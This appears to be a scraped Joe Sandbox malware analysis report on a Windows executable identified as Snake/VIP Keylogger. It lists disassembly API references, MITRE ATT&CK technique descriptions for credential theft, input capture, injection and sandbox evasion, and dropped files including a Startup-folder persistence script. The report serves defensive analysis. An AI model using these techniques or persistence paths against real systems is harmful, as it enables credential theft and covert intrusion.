Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 4c8ebd8ecdc5fdb3bf6e6eb67cad17cf40b82b7f7eb6a0a0809e9ed45fbed3f0
Instruction ID: 8efbe3b2d1d07223e29de34277fd8df58c789bc9f9c107fb610a0cadab7c17d8
Opcode Fuzzy Hash: 4c8ebd8ecdc5fdb3bf6e6eb67cad17cf40b82b7f7eb6a0a0809e9ed45fbed3f0
Instruction Fuzzy Hash: F2D0C9313853286BE26467709C0BFC66A28AB14B25F51481AB645AA2D0C9A8A9448668

Function 004F8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004F86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004F86B5

Part of subcall function 004D7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004D7AD0

Strings

Shell_TrayWnd, xrefs: 004F869B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7aa6295190ffe71980d07ebbf7e8b80386215937ba3a5e50acc9bccb67b7939d
Instruction ID: 10c0748a7efb45f26e0c30ef964b6bf6695f59b5ebfbcb82381f59df27f8d69c
Opcode Fuzzy Hash: 7aa6295190ffe71980d07ebbf7e8b80386215937ba3a5e50acc9bccb67b7939d
Instruction Fuzzy Hash: 77D01231385328B7E37477709C1FFC67F28AB14B25F11481AB749AA2D0C9E8E944C764

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FACT0987789000900.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autC090.tmp

C:\Users\user\AppData\Local\Temp\autC94A.tmp

C:\Users\user\AppData\Local\Temp\autFA4D.tmp

C:\Users\user\AppData\Local\Temp\retrofits

C:\Users\user\AppData\Local\thixolabile\juvenile.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Static File Info

General

File Icon

Windows Analysis Report
FACT0987789000900.exe

Function 004BB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00493D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00493742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Function 004ADDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0049406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 004DFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 004DBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00493E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre